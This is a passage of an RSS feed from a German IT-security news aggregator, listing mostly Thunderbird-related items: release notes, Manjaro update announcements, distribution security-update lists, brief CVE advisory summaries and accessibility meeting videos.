<description><![CDATA[Author: Mozilla Thunderbird - Bewertung: 1x - Views:3 The March accessibility meeting focused on progress across our accessibility statement, guidelines, testing, and success metrics, while also identifying gaps in automation, documentation, and user feedback. We also discussed how to better supp...]]></description>
<link>https://tsecurity.de/de/3552210/video/accessibility-committee-march-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3552210/video/accessibility-committee-march-2026/</guid>
<pubDate>Wed, 27 May 2026 20:54:15 +0200</pubDate>
<category>🎥 Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Mozilla Thunderbird - Bewertung: 1x - Views:3 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/iCOIUVbobFI?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>The March accessibility meeting focused on progress across our accessibility statement, guidelines, testing, and success metrics, while also identifying gaps in automation, documentation, and user feedback. We also discussed how to better support and involve the community so our accessibility work is informed, practical, and visible across all Thunderbird experiences.<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Accessibility Committee: April 2026]]></title>
<description><![CDATA[Author: Mozilla Thunderbird - Bewertung: 0x - Views:2 The April accessibility meeting focused on improving the draft accessibility statement, planning the structure of the new guidelines, and discussing where this work should be shared so it reaches both contributors and the wider community. We a...]]></description>
<link>https://tsecurity.de/de/3552209/video/accessibility-committee-april-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3552209/video/accessibility-committee-april-2026/</guid>
<pubDate>Wed, 27 May 2026 20:54:14 +0200</pubDate>
<category>🎥 Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Mozilla Thunderbird - Bewertung: 0x - Views:2 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/MLgq9mfS61I?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>The April accessibility meeting focused on improving the draft accessibility statement, planning the structure of the new guidelines, and discussing where this work should be shared so it reaches both contributors and the wider community. We also explored ways to build stronger accessibility connections through community spaces and outlined a few clear next steps for feedback and follow-up.<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Wednesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (bind, buildah, compat-libtiff3, compat-openssl11, containernetworking-plugins, crun, delve, dnsmasq, dovecot, edk2, firefox, freeipmi, gdk-pixbuf2, giflib, git-lfs, glib2, go-fdo-client, go-fdo-server, golang, grafana, grafana-pcp, gstreamer1-plugin...]]></description>
<link>https://tsecurity.de/de/3551251/linux-tipps/security-updates-for-wednesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3551251/linux-tipps/security-updates-for-wednesday/</guid>
<pubDate>Wed, 27 May 2026 15:28:10 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (bind, buildah, compat-libtiff3, compat-openssl11, containernetworking-plugins, crun, delve, dnsmasq, dovecot, edk2, firefox, freeipmi, gdk-pixbuf2, giflib, git-lfs, glib2, go-fdo-client, go-fdo-server, golang, grafana, grafana-pcp, gstreamer1-plugins-bad-free, gstreamer1-plugins-base, gstreamer1-plugins-good, and gstreamer1-plugins-ugly-free, iputils, jq, kernel, krb5, libcap, LibRaw, libsndfile, libsoup, libsoup3, libssh, libtiff, libvirt, linux-sgx, luksmeta, mingw-glib2, NetworkManager, nginx, nginx:1.24, nginx:1.26, openexr, openssh, openssl, opentelemetry-collector, p11-kit, PackageKit, podman, python-jwcrypto, python-markdown, python-tornado, python3.11, python3.12, python3.14, python3.9, qemu-kvm, rsync, skopeo, sudo, systemd, thunderbird, tomcat, unbound, vim, xorg-x11-server, xorg-x11-server-Xwayland, yggdrasil, and yggdrasil-worker-package-manager), <b>Debian</b> (imagemagick, kdenlive, memcached, node-shell-quote, and samba), <b>Fedora</b> (chromium, curl, editorconfig, haproxy, perl-Crypt-DSA, perl-HTTP-Tiny, poppler, rust-afterburn, rust-coreos-installer, rust-eif_build, rust-rpm-sequoia, rust-sequoia-chameleon-gnupg, rust-sequoia-git, rust-sequoia-keystore-server, rust-sequoia-octopus-librnp, rust-sequoia-openpgp, rust-sequoia-sop, rust-sequoia-sq, rust-sequoia-sqv, and uriparser), <b>Oracle</b> (compat-libtiff3, dnsmasq, firefox, freeipmi, kernel, and uek-kernel), <b>Slackware</b> (mozilla), <b>SUSE</b> (assimp, firefox, glibc, gnutls, go1.25-openssl, go1.26-openssl, kernel, kubevirt, leancrypto, libarchive, libsndfile, mcphost, nginx, openssh, podman, python-GitPython, rsync, and samba), and <b>Ubuntu</b> (ayttm, dnsmasq, libssh2, linux-azure, linux-azure, linux-azure-6.17, linux-iot, linux-lowlatency-hwe-5.15, ngtcp2, onnx, opencc, protobuf, python-git, samba, xdg-dbus-proxy, and xmlrpc-c).]]></content:encoded>
</item>
<item>
<title><![CDATA[Thunderbird für Android: Version 19.0 bringt neue Funktionen]]></title>
<description><![CDATA[Das Team hinter Thunderbird für Android hat die Version 19.0 veröffentlicht. Nutzer können nun die Aktionen in den Benachrichtigungen für neue Nachrichten nach eigenen Vorlieben anpassen. Eine weitere Neuerung betrifft die Darstellung der Inhalte, denn die Schriftgröße in Nachrichten orientiert.....]]></description>
<link>https://tsecurity.de/de/3550219/it-nachrichten/thunderbird-fuer-android-version-190-bringt-neue-funktionen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3550219/it-nachrichten/thunderbird-fuer-android-version-190-bringt-neue-funktionen/</guid>
<pubDate>Wed, 27 May 2026 09:47:21 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Das Team hinter Thunderbird für Android hat die Version 19.0 veröffentlicht. Nutzer können nun die Aktionen in den Benachrichtigungen für neue Nachrichten nach eigenen Vorlieben anpassen. Eine weitere Neuerung betrifft die Darstellung der Inhalte, denn die Schriftgröße in Nachrichten orientiert...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/thunderbird-fuer-android-version-19-0-bringt-neue-funktionen/">Thunderbird für Android: Version 19.0 bringt neue Funktionen</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Stable Update] 2026-05-27 - Kernels, Nvidia, Firefox, Thunderbird, Mesa, Blender]]></title>
<description><![CDATA[Hello Manjaro user community, here we have another set of package updates. We are continuing our development of the upcoming release of ‘Bian-May’ which can be expected end of June, beginning of July. Development speed may be a little slower the upcoming weeks. However, still let us know any issu...]]></description>
<link>https://tsecurity.de/de/3550016/unix-server/stable-update-2026-05-27-kernels-nvidia-firefox-thunderbird-mesa-blender/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3550016/unix-server/stable-update-2026-05-27-kernels-nvidia-firefox-thunderbird-mesa-blender/</guid>
<pubDate>Wed, 27 May 2026 08:30:32 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello Manjaro user community, here we have another set of package updates. We are continuing our development of the upcoming release of ‘Bian-May’ which can be expected end of June, beginning of July. Development speed may be a little slower the upcoming weeks. However, still let us know any issues you may found thus far.</p>
<h3><a name="p-858621-current-promotions-1" class="anchor" href="https://forum.manjaro.org/#p-858621-current-promotions-1" aria-label="Heading link"></a>Current Promotions</h3>
<ul>
<li>Get the latest Gaming Laptop by Slimbook powered by Manjaro: <a href="https://slimbook.com/manjaro">Slimbook Manjaro III</a></li>
<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">See current promotion</a></li>
</ul>
<h2><a name="p-858621-recent-news-2" class="anchor" href="https://forum.manjaro.org/#p-858621-recent-news-2" aria-label="Heading link"></a>Recent News</h2>

New in Manjaro GNOME!
Or, if you prefer the command line: <a href="https://forum.manjaro.org/t/stable-update-2026-05-27-kernels-nvidia-firefox-thunderbird-mesa-blender/187938/1">(click for more details)</a>

KDE Plasma users with SDDM can now migrate to Plasma Login Manager <a href="https://forum.manjaro.org/t/stable-update-2026-05-27-kernels-nvidia-firefox-thunderbird-mesa-blender/187938/1">(click for more details)</a>

NVIDIA 590 driver drops Pascal support <a href="https://forum.manjaro.org/t/stable-update-2026-05-27-kernels-nvidia-firefox-thunderbird-mesa-blender/187938/1">(click for more details)</a>
<ul>
<li><a href="https://forum.manjaro.org/t/manjaro-26-1-bian-may-preview-released/187389" class="inline-onebox">Manjaro 26.1 Bian-May - Preview released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-26-0-anh-linh-released/184526" class="inline-onebox">Manjaro 26.0 Anh-Linh released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-summit-public-alpha-now-available/176995" class="inline-onebox">Manjaro Summit public Alpha now available</a></li>
<li>As of Linux 5.4.302, the 5.4 series is now EOL (End Of Life). Please install 5.10 LTS (Long Term Support) or 5.15 LTS.</li>
<li>As of Linux 6.16.12, the 6.16 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 6.17.13, the 6.17 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 6.19.14, the 6.19 series is now EOL (End Of Life). Please install 7.0, and/or 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
</ul>

Previous News
Finding information easier about Manjaro <a href="https://forum.manjaro.org/t/stable-update-2026-05-27-kernels-nvidia-firefox-thunderbird-mesa-blender/187938/1">(click for more details)</a>
<h2><a name="p-858621-notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#p-858621-notable-package-updates-3" aria-label="Heading link"></a>Notable Package Updates</h2>
<ul>
<li><strong>Kernels</strong> got all updated
<ul>
<li><code>linux617-rt</code> got removed</li>
<li><code>linux-firmware</code> uses now zst compression</li>
</ul>
</li>
<li><strong>Firefox</strong> <a href="https://www.firefox.com/firefox/151.0.1/releasenotes/">151.0.1</a></li>
<li><strong>Thunderbird</strong> <a href="https://www.thunderbird.net/thunderbird/151.0/releasenotes/">151.0</a></li>
<li>Fixes to <strong>gstreamer</strong> and <strong>pipewire</strong></li>
<li><strong>Blender</strong> <a href="https://developer.blender.org/docs/release_notes/5.1/corrective_releases/#blender-512">5.1.2</a></li>
<li><strong>NVIDIA</strong> <a href="https://www.nvidia.com/en-us/drivers/details/271252/">580.159.04</a></li>
<li><strong>Vivaldi</strong> <a href="https://vivaldi.com/blog/vivaldi-on-desktop-8-0/">8.0</a></li>
<li><strong>Firefox</strong> <a href="https://www.firefox.com/firefox/151.0/releasenotes/">151.0</a></li>
<li><strong>Thunderbird</strong> <a href="https://www.thunderbird.net/thunderbird/150.0.2/releasenotes/">150.0.2</a></li>
<li><strong>Mesa</strong> <a href="https://docs.mesa3d.org/relnotes/26.1.1.html">26.1.1</a></li>
<li><strong>Qt5</strong> <a href="https://www.qt.io/blog/commercial-lts-qt-5.15.19-released">5.15.19</a></li>
<li>Updates to <strong>Deepin</strong> and <strong>Python</strong></li>
</ul>
<h2><a name="p-858621-additional-info-4" class="anchor" href="https://forum.manjaro.org/#p-858621-additional-info-4" aria-label="Heading link"></a>Additional Info</h2>

Python 3.14 info <a href="https://forum.manjaro.org/t/stable-update-2026-05-27-kernels-nvidia-firefox-thunderbird-mesa-blender/187938/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/stable-update-2026-05-27-kernels-nvidia-firefox-thunderbird-mesa-blender/187938/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux61 6.1.174</li>
<li>linux66 6.6.141</li>
<li>linux612 6.12.91</li>
<li>linux618 6.18.33</li>
<li>linux70 7.0.10</li>
<li>linux71 7.1.0-rc5</li>
<li>linux61-rt 6.1.167_rt62</li>
<li>linux66-rt 6.6.135_rt74</li>
<li>linux612-rt 6.12.89_rt18</li>
</ul>
<p><strong>Package Changes</strong> (5/26/26 07:53 CEST)</p>
<ul>
<li>stable core x86_64:  46 new and 48 removed package(s)</li>
<li>stable extra x86_64:  2177 new and 2353 removed package(s)</li>
<li>stable multilib x86_64:  31 new and 31 removed package(s)</li>
</ul>
<p>A list of all package changes can be found <a href="https://termbin.com/faxv">here</a>.</p>
<p><a href="https://forum.manjaro.org/t/stable-update-2026-05-27-kernels-nvidia-firefox-thunderbird-mesa-blender/187938/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
<hr>
            <p><small>2 posts - 2 participants</small></p>
            <p><a href="https://forum.manjaro.org/t/stable-update-2026-05-27-kernels-nvidia-firefox-thunderbird-mesa-blender/187938">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in mozilla-thunderbird (Slackware)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3549951/unix-server/security-mehrere-probleme-in-mozilla-thunderbird-slackware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3549951/unix-server/security-mehrere-probleme-in-mozilla-thunderbird-slackware/</guid>
<pubDate>Wed, 27 May 2026 08:00:56 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Mehrere Probleme in thunderbird (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3549197/it-security-nachrichten/mehrere-probleme-in-thunderbird-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3549197/it-security-nachrichten/mehrere-probleme-in-thunderbird-red-hat/</guid>
<pubDate>Tue, 26 May 2026 22:38:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Thunderbird 151.0.1 ist da: Fix für Exchange-Nutzer]]></title>
<description><![CDATA[Kurz nach dem letzten großen Wurf schieben die Entwickler von Thunderbird ein Update hinterher. Die Version 151.0.1 konzentriert sich auf einen speziellen Fehler, der Nutzer im beruflichen Umfeld genervt haben dürfte. Wer mit Exchange-Konten arbeitet, stieß beim Weiterleiten oder Umleiten...Zum B...]]></description>
<link>https://tsecurity.de/de/3549146/it-nachrichten/thunderbird-15101-ist-da-fix-fuer-exchange-nutzer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3549146/it-nachrichten/thunderbird-15101-ist-da-fix-fuer-exchange-nutzer/</guid>
<pubDate>Tue, 26 May 2026 22:01:59 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Kurz nach dem letzten großen Wurf schieben die Entwickler von Thunderbird ein Update hinterher. Die Version 151.0.1 konzentriert sich auf einen speziellen Fehler, der Nutzer im beruflichen Umfeld genervt haben dürfte. Wer mit Exchange-Konten arbeitet, stieß beim Weiterleiten oder Umleiten...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/thunderbird-151-0-1-ist-da-fix-fuer-exchange-nutzer/">Thunderbird 151.0.1 ist da: Fix für Exchange-Nutzer</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Testing Update] 2026-05-26 - Kernels, Thunderbird, Firefox, Pipewire, Gstreamer]]></title>
<description><![CDATA[Hello Manjaro user community, here we have another set of package updates. We are continuing our development of the upcoming release of ‘Bian-May’ which can be expected end of June, beginning of July. Development speed may be a little slower the upcoming weeks. However, still let us know any issu...]]></description>
<link>https://tsecurity.de/de/3547005/unix-server/testing-update-2026-05-26-kernels-thunderbird-firefox-pipewire-gstreamer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3547005/unix-server/testing-update-2026-05-26-kernels-thunderbird-firefox-pipewire-gstreamer/</guid>
<pubDate>Tue, 26 May 2026 08:15:29 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello Manjaro user community, here we have another set of package updates. We are continuing our development of the upcoming release of ‘Bian-May’ which can be expected end of June, beginning of July. Development speed may be a little slower the upcoming weeks. However, still let us know any issues you may found thus far.</p>
<h3><a name="p-858504-current-promotions-1" class="anchor" href="https://forum.manjaro.org/#p-858504-current-promotions-1" aria-label="Heading link"></a>Current Promotions</h3>
<ul>
<li>Get the latest Gaming Laptop by Slimbook powered by Manjaro: <a href="https://slimbook.com/manjaro">Slimbook Manjaro III</a></li>
<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">See current promotion</a></li>
</ul>
<h2><a name="p-858504-recent-news-2" class="anchor" href="https://forum.manjaro.org/#p-858504-recent-news-2" aria-label="Heading link"></a>Recent News</h2>

New in Manjaro GNOME!
Or, if you prefer the command line: <a href="https://forum.manjaro.org/t/testing-update-2026-05-26-kernels-thunderbird-firefox-pipewire-gstreamer/187917/1">(click for more details)</a>

KDE Plasma users with SDDM can now migrate to Plasma Login Manager <a href="https://forum.manjaro.org/t/testing-update-2026-05-26-kernels-thunderbird-firefox-pipewire-gstreamer/187917/1">(click for more details)</a>

NVIDIA 590 driver drops Pascal support <a href="https://forum.manjaro.org/t/testing-update-2026-05-26-kernels-thunderbird-firefox-pipewire-gstreamer/187917/1">(click for more details)</a>
<ul>
<li><a href="https://forum.manjaro.org/t/manjaro-26-1-bian-may-preview-released/187389" class="inline-onebox">Manjaro 26.1 Bian-May - Preview released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-26-0-anh-linh-released/184526" class="inline-onebox">Manjaro 26.0 Anh-Linh released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-summit-public-alpha-now-available/176995" class="inline-onebox">Manjaro Summit public Alpha now available</a></li>
<li>As of Linux 5.4.302, the 5.4 series is now EOL (End Of Life). Please install 5.10 LTS (Long Term Support) or 5.15 LTS.</li>
<li>As of Linux 6.16.12, the 6.16 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 6.17.13, the 6.17 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 6.19.14, the 6.19 series is now EOL (End Of Life). Please install 7.0, and/or 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
</ul>

Previous News
Finding information easier about Manjaro <a href="https://forum.manjaro.org/t/testing-update-2026-05-26-kernels-thunderbird-firefox-pipewire-gstreamer/187917/1">(click for more details)</a>
<h2><a name="p-858504-notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#p-858504-notable-package-updates-3" aria-label="Heading link"></a>Notable Package Updates</h2>
<ul>
<li><strong>Kernels</strong> got all updated
<ul>
<li><code>linux617-rt</code> got removed</li>
<li><code>linux-firmware</code> uses now zst compression</li>
</ul>
</li>
<li><strong>Firefox</strong> <a href="https://www.firefox.com/firefox/151.0.1/releasenotes/">151.0.1</a></li>
<li><strong>Thunderbird</strong> <a href="https://www.thunderbird.net/thunderbird/151.0/releasenotes/">151.0</a></li>
<li>Fixes to <strong>gstreamer</strong> and <strong>pipewire</strong></li>
<li>Updates to <strong>Deepin</strong> and <strong>Python</strong></li>
</ul>
<h2><a name="p-858504-additional-info-4" class="anchor" href="https://forum.manjaro.org/#p-858504-additional-info-4" aria-label="Heading link"></a>Additional Info</h2>

Python 3.14 info <a href="https://forum.manjaro.org/t/testing-update-2026-05-26-kernels-thunderbird-firefox-pipewire-gstreamer/187917/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/testing-update-2026-05-26-kernels-thunderbird-firefox-pipewire-gstreamer/187917/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux61 6.1.174</li>
<li>linux66 6.6.141</li>
<li>linux612 6.12.91</li>
<li>linux618 6.18.33</li>
<li>linux70 7.0.10</li>
<li>linux71 7.1.0-rc5</li>
<li>linux61-rt 6.1.167_rt62</li>
<li>linux66-rt 6.6.135_rt74</li>
<li>linux612-rt 6.12.89_rt18</li>
</ul>
<p><strong>Package Changes</strong> (5/26/26 07:53 CEST)</p>
<ul>
<li>testing core x86_64:  37 new and 39 removed package(s)</li>
<li>testing extra x86_64:  1826 new and 1898 removed package(s)</li>
<li>testing multilib x86_64:  5 new and 5 removed package(s)</li>
</ul>
<p>A list of all package changes can be found <a href="https://termbin.com/bew3">here</a>.</p>
<p><a href="https://forum.manjaro.org/t/testing-update-2026-05-26-kernels-thunderbird-firefox-pipewire-gstreamer/187917/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
<hr>
            <p><small>1 post - 1 participant</small></p>
            <p><a href="https://forum.manjaro.org/t/testing-update-2026-05-26-kernels-thunderbird-firefox-pipewire-gstreamer/187917">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Tails 7.8 Removes Thunderbird: What Changed and What Users Should Do]]></title>
<description><![CDATA[Tails 7.8 removes Thunderbird from the default image, but the change is more practical than it first sounds. Our VM check found an Install Thunderbird prompt, not a working bundled app, while official docs explain how Persistent Storage and Additional Software now handle the email client after up...]]></description>
<link>https://tsecurity.de/de/3546588/linux-tipps/tails-78-removes-thunderbird-what-changed-and-what-users-should-do/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3546588/linux-tipps/tails-78-removes-thunderbird-what-changed-and-what-users-should-do/</guid>
<pubDate>Tue, 26 May 2026 02:08:47 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Tails 7.8 removes Thunderbird from the default image, but the change is more practical than it first sounds. Our VM check found an Install Thunderbird prompt, not a working bundled app, while official docs explain how Persistent Storage and Additional Software now handle the email client after upgrade.]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Monday]]></title>
<description><![CDATA[Security updates have been issued by Debian (atril, evince, gnutls28, haproxy, haveged, jq, kernel, krb5, libgcrypt20, nodejs, and thunderbird), Fedora (aw-server-rust, awatcher, bind, bind-dyndb-ldap, chromium, composer, docker-buildkit, docker-buildx, dotnet10.0, dotnet8.0, dotnet9.0, evince, f...]]></description>
<link>https://tsecurity.de/de/3545828/linux-tipps/security-updates-for-monday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3545828/linux-tipps/security-updates-for-monday/</guid>
<pubDate>Mon, 25 May 2026 16:53:19 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (atril, evince, gnutls28, haproxy, haveged, jq, kernel, krb5, libgcrypt20, nodejs, and thunderbird), <b>Fedora</b> (aw-server-rust, awatcher, bind, bind-dyndb-ldap, chromium, composer, docker-buildkit, docker-buildx, dotnet10.0, dotnet8.0, dotnet9.0, evince, firefox, httpd, kernel, nodejs-aw-webui, nss, perl-Apache-Session-Browseable, pie, python-pulp-glue, python-requests, and python3.15), <b>Slackware</b> (kernel), <b>SUSE</b> (apptainer, chromium, cockpit, dnsmasq, google-guest-agent, hauler, iproute2, jfrog-cli, kernel, libecpg6, libsolv, libzypp, zypper, mcphost, oci-cli, perl-YAML-Syck, python-lxml, python-urllib3, python311-impacket, rqlite, rsync, util-linux, and xz), and <b>Ubuntu</b> (evince, linux-azure, linux-azure-5.4, linux-azure-fips, linux-azure-4.15, linux-azure-fips, linux-fips, linux-gcp-5.15, linux-lowlatency-hwe-5.15, linux-oracle-6.17, node-path-to-regexp, and rclone).]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-29909 | Mozilla Thunderbird up to 91.8 Document cross-domain policy (Bug 1755081 / EUVD-2022-34219)]]></title>
<description><![CDATA[A vulnerability labeled as critical has been found in Mozilla Thunderbird up to 91.8. Impacted is an unknown function of the component Document Handler. The manipulation results in permissive cross-domain policy with untrusted domains.

This vulnerability is known as CVE-2022-29909. It is possibl...]]></description>
<link>https://tsecurity.de/de/3542854/sicherheitsluecken/cve-2022-29909-mozilla-thunderbird-up-to-918-document-cross-domain-policy-bug-1755081-euvd-2022-34219/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3542854/sicherheitsluecken/cve-2022-29909-mozilla-thunderbird-up-to-918-document-cross-domain-policy-bug-1755081-euvd-2022-34219/</guid>
<pubDate>Sun, 24 May 2026 04:20:37 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/mozilla:thunderbird">Mozilla Thunderbird up to 91.8</a>. Impacted is an unknown function of the component <em>Document Handler</em>. The manipulation results in permissive cross-domain policy with untrusted domains.

This vulnerability is known as <a href="https://vuldb.com/cve/CVE-2022-29909">CVE-2022-29909</a>. It is possible to launch the attack remotely. No exploit is available.

The affected component should be upgraded.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-29911 | Mozilla Thunderbird up to 91.8 iFrame sandbox (Bug 1761981 / EUVD-2022-34221)]]></title>
<description><![CDATA[A vulnerability described as critical has been identified in Mozilla Thunderbird up to 91.8. The impacted element is an unknown function of the component iFrame Handler. Such manipulation leads to sandbox issue.

This vulnerability is uniquely identified as CVE-2022-29911. The attack can be launc...]]></description>
<link>https://tsecurity.de/de/3542851/sicherheitsluecken/cve-2022-29911-mozilla-thunderbird-up-to-918-iframe-sandbox-bug-1761981-euvd-2022-34221/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3542851/sicherheitsluecken/cve-2022-29911-mozilla-thunderbird-up-to-918-iframe-sandbox-bug-1761981-euvd-2022-34221/</guid>
<pubDate>Sun, 24 May 2026 04:20:33 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">critical</a> has been identified in <a href="https://vuldb.com/product/mozilla:thunderbird">Mozilla Thunderbird up to 91.8</a>. The impacted element is an unknown function of the component <em>iFrame Handler</em>. Such manipulation leads to sandbox issue.

This vulnerability is uniquely identified as <a href="https://vuldb.com/cve/CVE-2022-29911">CVE-2022-29911</a>. The attack can be launched remotely. No exploit exists.

Upgrading the affected component is recommended.]]></content:encoded>
</item>
<item>
<title><![CDATA[Firefox- und Thunderbird-Lücke: BSI warnt, Risiko 4/hoch, CVSS 8,8]]></title>
<description><![CDATA[BONN / LONDON (IT BOLTWISE) – Das Bundesamt für Sicherheit in der Informationstechnik (BSI) warnt vor mehreren Schwachstellen in Mozilla Firefox und Thunderbird, die laut Bewertung auch Fernangriffe ermöglichen. Die Einstufung liegt mit einem CVSS Base Score von 8,8 im Bereich „hoch“ (Risikostufe...]]></description>
<link>https://tsecurity.de/de/3542234/it-security-nachrichten/firefox-und-thunderbird-luecke-bsi-warnt-risiko-4hoch-cvss-88/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3542234/it-security-nachrichten/firefox-und-thunderbird-luecke-bsi-warnt-risiko-4hoch-cvss-88/</guid>
<pubDate>Sat, 23 May 2026 18:39:01 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
